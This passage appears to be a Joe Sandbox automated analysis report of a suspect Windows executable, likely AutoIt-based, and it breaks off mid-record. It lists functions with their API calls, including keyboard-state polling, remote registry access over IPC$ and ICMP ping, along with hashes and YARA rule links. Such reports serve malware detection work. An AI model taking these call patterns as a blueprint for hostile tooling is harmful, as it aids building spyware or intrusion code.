                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2420728520-1007645807
                                        • Opcode ID: f176a9abfc086b2c17da9e9a592f10c388398dce7933e1b47bed73c32331de6b
                                        • Instruction ID: 1c6091ea2550a7a38639931444192e86ddaf12e7176e2eff42b2f674dd85ea3d
                                        • Opcode Fuzzy Hash: f176a9abfc086b2c17da9e9a592f10c388398dce7933e1b47bed73c32331de6b
                                        • Instruction Fuzzy Hash: 89119131A902597DD720B7A5DC4AEFF6ABCEBD1B04F00442AB415A60D1EFB01A05C6B1
                                        Function 000D5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 000D5CE2
                                        • GetWindowRect.USER32(00000000,?), ref: 000D5CFB
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 000D5D59
                                        • GetDlgItem.USER32(?,00000002), ref: 000D5D69
                                        • GetWindowRect.USER32(00000000,?), ref: 000D5D7B
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 000D5DCF
                                        • GetDlgItem.USER32(?,000003E9), ref: 000D5DDD
                                        • GetWindowRect.USER32(00000000,?), ref: 000D5DEF
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 000D5E31
                                        • GetDlgItem.USER32(?,000003EA), ref: 000D5E44
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000D5E5A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 000D5E67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 2c9e754c3f4698db8bed1b28e1947a17449679a9962da646d9cc841739bbd1ec
                                        • Instruction ID: 7b29f9fbf567ed02b4d99ceae3dae32bce2af2da4c9c5ad1842f3efe902f0d4d
                                        • Opcode Fuzzy Hash: 2c9e754c3f4698db8bed1b28e1947a17449679a9962da646d9cc841739bbd1ec
                                        • Instruction Fuzzy Hash: A051FF71A00705AFDB18DF68DD89AAE7BB6EB48301F148229F915E7790D7709E44CF60
                                        Function 00088BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00088F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00088BE8,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 00088FC5
                                        • DestroyWindow.USER32(?), ref: 00088C81
                                        • KillTimer.USER32(00000000,?,?,?,?,00088BBA,00000000,?), ref: 00088D1B
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 000C6973
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 000C69A1
                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 000C69B8
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00088BBA,00000000), ref: 000C69D4
                                        • DeleteObject.GDI32(00000000), ref: 000C69E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 641708696-0
                                        • Opcode ID: 4860f6110433edaec37644723ec0df8be16f1ca49c12922b4912e488cd824867
                                        • Instruction ID: 8a6b37c2b4c4198a342deca1cc1d201c617e9abf2e47f4970b9ef33621f9984f
                                        • Opcode Fuzzy Hash: 4860f6110433edaec37644723ec0df8be16f1ca49c12922b4912e488cd824867
                                        • Instruction Fuzzy Hash: 6D617934502710EFDB75AF14DA48B2AB7F1FB41316F94852CE0829A9B4CB72A9C0CF91
                                        Function 00089838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089944: GetWindowLongW.USER32(?,000000EB), ref: 00089952
                                        • GetSysColor.USER32(0000000F), ref: 00089862
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 3bbc4df3228e0471ea7d8e1d04dcb4d3e6df0bb1f5357d8a4f0903e683083a61
                                        • Instruction ID: 68ba847ddbafc70b0ea67003a11c2d444b7b0e0d191b4e51e338947961983881
                                        • Opcode Fuzzy Hash: 3bbc4df3228e0471ea7d8e1d04dcb4d3e6df0bb1f5357d8a4f0903e683083a61
                                        • Instruction Fuzzy Hash: 72419131204641EFDB607F389C84BB93BA5BB46334F184619F9E6871E1DB719C82DB60
                                        Function 000D96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,000BF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 000D9717
                                        • LoadStringW.USER32(00000000,?,000BF7F8,00000001), ref: 000D9720
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,000BF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 000D9742
                                        • LoadStringW.USER32(00000000,?,000BF7F8,00000001), ref: 000D9745
                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 000D9866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 747408836-2268648507
                                        • Opcode ID: f3ad853d4b248286d2e6ed1b94594a61cb9f9d4353d61c7f24d867da73fda9bb
                                        • Instruction ID: 1de03bf7564a11e61c9c1540a2069e05b18e089cf48d1b02daf5c1ea9ca12d12
                                        • Opcode Fuzzy Hash: f3ad853d4b248286d2e6ed1b94594a61cb9f9d4353d61c7f24d867da73fda9bb
                                        • Instruction Fuzzy Hash: 78413B72D00209AADB14EBA0CE46DEEB778AF55340F508125F60A72193EF396F48CB75
                                        Function 000D06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000D07A2
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000D07BE
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000D07DA
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000D0804
                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 000D082C
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000D0837
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000D083C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 323675364-22481851
                                        • Opcode ID: 79b2291befbb93bd089fbb6145b12ffe593b743d77009585e63aaf75747028a8
                                        • Instruction ID: f4bcc53c0d3201af9bafa6b396c6a55af1a7bbdb73afc480665526afde6f68be
                                        • Opcode Fuzzy Hash: 79b2291befbb93bd089fbb6145b12ffe593b743d77009585e63aaf75747028a8
                                        • Instruction Fuzzy Hash: AA412972C10228EBDF11EBA4DC85DEDB7B8BF44750F44812AE905A31A1EB745E44CFA0
                                        Function 000F3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000F3C5C
                                        • CoInitialize.OLE32(00000000), ref: 000F3C8A
                                        • CoUninitialize.OLE32 ref: 000F3C94
                                        • _wcslen.LIBCMT ref: 000F3D2D
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 000F3DB1
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 000F3ED5
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 000F3F0E
                                        • CoGetObject.OLE32(?,00000000,0010FB98,?), ref: 000F3F2D
                                        • SetErrorMode.KERNEL32(00000000), ref: 000F3F40
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000F3FC4
                                        • VariantClear.OLEAUT32(?), ref: 000F3FD8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: b131812b4b8793b6bcb93525ecda5627bc201e3f4a30a288a6036acc4092749a
                                        • Instruction ID: 48525fa4ac6fa76444607ac693ef4df9c2abb1ed3972155bd986b039e9b2963a
                                        • Opcode Fuzzy Hash: b131812b4b8793b6bcb93525ecda5627bc201e3f4a30a288a6036acc4092749a
                                        • Instruction Fuzzy Hash: 8BC177716083099FC700DF28C88496BBBE9FF89758F10491DFA8A9B251D771EE45CB92
                                        Function 000E7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 000E7AF3
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000E7B8F
                                        • SHGetDesktopFolder.SHELL32(?), ref: 000E7BA3
                                        • CoCreateInstance.OLE32(0010FD08,00000000,00000001,00136E6C,?), ref: 000E7BEF
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000E7C74
                                        • CoTaskMemFree.OLE32(?,?), ref: 000E7CCC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 000E7D57
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000E7D7A
                                        • CoTaskMemFree.OLE32(00000000), ref: 000E7D81
                                        • CoTaskMemFree.OLE32(00000000), ref: 000E7DD6
                                        • CoUninitialize.OLE32 ref: 000E7DDC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: df4d8f3505d43c273e7a92f66f2547db95a9b8289fc4c43f27f6887d52f1f52e
                                        • Instruction ID: b5604601ef3f044c35b9a49de9eb308333796e181ad3ce67f73df5cedcda55b3
                                        • Opcode Fuzzy Hash: df4d8f3505d43c273e7a92f66f2547db95a9b8289fc4c43f27f6887d52f1f52e
                                        • Instruction Fuzzy Hash: 86C12B75A04149AFCB14DFA5C884DAEBBF9FF48304B148599E819EB362D731EE41CB90
                                        Function 0010541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00105504
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00105515
                                        • CharNextW.USER32(00000158), ref: 00105544
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00105585
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0010559B
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001055AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID:
                                        • API String ID: 1350042424-0
                                        • Opcode ID: a634db3e9d040984215c749f1ad18121939c77b26a5dd954fc3b8e0c46b681b9
                                        • Instruction ID: ef943e3b91cd845f0b354bfb4bfa853e2b529c6bd9238bfff3feca0d8f174845
                                        • Opcode Fuzzy Hash: a634db3e9d040984215c749f1ad18121939c77b26a5dd954fc3b8e0c46b681b9
                                        • Instruction Fuzzy Hash: 77617C34900609ABDF209F54CC84DFF7BBAEB0A724F104145F9A5AB2D1DBB59A81DF60
                                        Function 000CFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 000CFAAF
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 000CFB08
                                        • VariantInit.OLEAUT32(?), ref: 000CFB1A
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CFB3A
                                        • VariantCopy.OLEAUT32(?,?), ref: 000CFB8D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 000CFBA1
                                        • VariantClear.OLEAUT32(?), ref: 000CFBB6
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 000CFBC3
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000CFBCC
                                        • VariantClear.OLEAUT32(?), ref: 000CFBDE
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000CFBE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 7923c3ea879ea011f88670fe854e1404966d8394bd98c0e4423e156bc6c126c9
                                        • Instruction ID: 5e643b4a18afa6442c458bc81f24838f5bd2f3bd4becc5b273276a4d1c514156
                                        • Opcode Fuzzy Hash: 7923c3ea879ea011f88670fe854e1404966d8394bd98c0e4423e156bc6c126c9
                                        • Instruction Fuzzy Hash: CB412D75A0021A9FCB009F64C854EEEBBBAFF48344F008169E945E7661CB74A945CFA1
                                        Function 000D9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 000D9CA1
                                        • GetAsyncKeyState.USER32(000000A0), ref: 000D9D22
                                        • GetKeyState.USER32(000000A0), ref: 000D9D3D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 000D9D57
                                        • GetKeyState.USER32(000000A1), ref: 000D9D6C
                                        • GetAsyncKeyState.USER32(00000011), ref: 000D9D84
                                        • GetKeyState.USER32(00000011), ref: 000D9D96
                                        • GetAsyncKeyState.USER32(00000012), ref: 000D9DAE
                                        • GetKeyState.USER32(00000012), ref: 000D9DC0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 000D9DD8
                                        • GetKeyState.USER32(0000005B), ref: 000D9DEA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 7c7f4cd3f5800e9d4d6ccc8f79edcdbd69d3ff44a44f16bfe76a62effef561b1
                                        • Instruction ID: 2f6852a9a87ea32678bc9becedcbcc4593aaea8546a66299df99d97a874e0cd8
                                        • Opcode Fuzzy Hash: 7c7f4cd3f5800e9d4d6ccc8f79edcdbd69d3ff44a44f16bfe76a62effef561b1
                                        • Instruction Fuzzy Hash: D341A6346047CA69FFB1976488043B5BEE16F11344F04815BDAC6567C2EBE599C8CBB2
                                        Function 000F055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 000F05BC
                                        • inet_addr.WSOCK32(?), ref: 000F061C
                                        • gethostbyname.WSOCK32(?), ref: 000F0628
                                        • IcmpCreateFile.IPHLPAPI ref: 000F0636
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000F06C6
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000F06E5
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 000F07B9
                                        • WSACleanup.WSOCK32 ref: 000F07BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 0c1ab6667f1a41ae30c9e64371eef19c2fa291d797bb55efa87dfb35939ffe13
                                        • Instruction ID: c44f3b36d41ef0936cf1c6c699d7007b6986599dbb212499aa46cf73ac276b9d
                                        • Opcode Fuzzy Hash: 0c1ab6667f1a41ae30c9e64371eef19c2fa291d797bb55efa87dfb35939ffe13
                                        • Instruction Fuzzy Hash: 7D917F759087019FD720DF15C888F2ABBE0AF84318F1485A9E5A98BAA3C770ED41DF91
                                        Function 000F8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 707087890-567219261
                                        • Opcode ID: be5d2a53ac117fae1ab85d82fe17465e5876fe6e50a2fcd2ca614dad54159b44
                                        • Instruction ID: 2faba0887317f436e8b1fea5b6df58625d91c19fa530eccb96d50874f9627870
                                        • Opcode Fuzzy Hash: be5d2a53ac117fae1ab85d82fe17465e5876fe6e50a2fcd2ca614dad54159b44
                                        • Instruction Fuzzy Hash: BA51D172A0051A9BCF64DF68C9418FEB7E5BF64320B218229E626E76C1DF34DD40E790
                                        Function 000F372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32 ref: 000F3774
                                        • CoUninitialize.OLE32 ref: 000F377F
                                        • CoCreateInstance.OLE32(?,00000000,00000017,0010FB78,?), ref: 000F37D9
                                        • IIDFromString.OLE32(?,?), ref: 000F384C
                                        • VariantInit.OLEAUT32(?), ref: 000F38E4
                                        • VariantClear.OLEAUT32(?), ref: 000F3936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
                                        • Opcode ID: dd39b9b9e28fdf17d371c14237bec5fdf20fb41baea0dadc735a07fffb1da557
                                        • Instruction ID: a9d2bc2e3ffe2790b3cfc6df5c4fbb3addca0c2ea598c5d7a3fb906c5d684ede
                                        • Opcode Fuzzy Hash: dd39b9b9e28fdf17d371c14237bec5fdf20fb41baea0dadc735a07fffb1da557
                                        • Instruction Fuzzy Hash: D261B170608305AFD320EF54C849BAEB7E4EF48760F104909FA8597691CB74EE49DB96
                                        Function 000E3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 000E33CF
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000E33F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
